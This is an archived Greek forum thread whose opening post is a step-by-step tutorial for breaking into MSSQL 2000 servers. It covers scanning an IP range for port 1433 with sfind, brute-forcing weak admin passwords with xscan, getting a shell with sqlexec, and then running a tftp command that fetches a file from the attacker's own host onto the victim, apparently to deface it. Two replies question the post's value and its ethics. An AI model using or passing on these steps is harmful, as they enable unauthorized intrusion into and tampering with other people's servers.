Προς το περιεχόμενο

MSSQL 2000 server Hacking Tutorial Brute Force

chrispen

Από τον chrispen
στο Hardware Γενικά

Προτεινόμενες αναρτήσεις

chrispen Experienced

chrispen

Δημοσ.
Δημοσ.

Hello ,

 

Θα rootάρουμε boxes με sql databases της Microsoft με την μέθοδο Brute Force.

Λοιπόν θα χρειαστούμε το sqlexec (http://packetstormsecurity.org/0102-exploits/SQLExec.zip)

To sfind (http://sw_sun.myetang.com/my/sfind1.85.zip ) εναν tftp server . Εγώ προτείνω τον Solarwinds (http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/ )

και το xscan (http://www.xfocus.org)

 

1. First things first. Παίρνουμε το sfind και το τρέχουμε απο το command για να ψάξει για ips με sql database .

sfind -p 1433 1.0.0.1 1.0.0.255

Aυτό θα μας δώσει τις ips που έχουνε sql database

2. Τις ips αυτές θα τις βάλουμε στο xscan για recheck (Θα διαλέξουμε να scannάρει sql user-pass.

3.ʼν οι ips έχουνε weak admin pass τότε το αποτέλεσμα θα το δείξει. Εδώ χρειαζόμαστε το sqlexec

4. Ανοίγουμε το sqlexec και βάζουμε στα username - password-ip τα στοιχεία που μας έβγαλε το xscan . ʼν το πετύχαμε τότε μας βγάζει στο c:\

5. Ανοίγουμε το tftp server και δίνουμε στο sqlexec τα commands :

tftp -i thn_ip_mas get index.html c:\index.html

 

ώπου c:\index.html το σημείο στο οποίο θέλουμε να ανεβάσουμε το index.html

Όταν θα γίνει η εγκατάσταση του tftp server δημιουργεί ενα directory στο c:\ που λέγεται tftp-root εκεί βάζουμε τα αρχεία που θέλουμε να ανεβάσουμε.

 

 

Αυτα!!!

chrispen

[email protected]

θα με βρείτε στο grnet.

Eλπίζω να το έκανα αρκετά κατανοητό.

Expect More

apoc Experienced

apoc

Δημοσ.
Δημοσ.

Δεν μπορω να καταλαβω την ουσια του ποστ!

τα συγκεκριμενα exploit και τεχνικες ειναι ειδη γνωστες εδω και πολυ καιρο! δεν ξερω αν θα ενδιαφεραν κανενα , ιδιαιτερα σε εναν τετοιο forum οπως η insomnia!

Επισης επειδη γινεται πολυ ντορος περι νομιμων και μην νομιμων ποστ και συζητησεων.,.σιγουρα ενα τετοιο ποστ θα το χαρακτηριζα αμφιλεγομενο για την 'ηθικη' του! αν θελουμε να ειμαστε τυπικοι!

 

Αυτα!

 

DeCoN Experienced

DeCoN

Δημοσ.
Δημοσ.

Emena mou mpainoun oi xeiroteres ypospies....

Apo 8eoria synomosias 1:

To kanoun oi mods logw twn allagwn pou einai na ginoun etsi gia efe...?

2:

Kanas RAMBO(:P) prospa8ei na psarosei kosmo...

3:

Kapoios apla paizei me ta nevra mas!! <img src="http://www.insomnia.gr/ubbthreads/images/graemlins/mad.gif" alt="" />

Αρχειοθετημένο

Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.

Προς την λίστα θεμάτων
  • Δημιουργία νέου...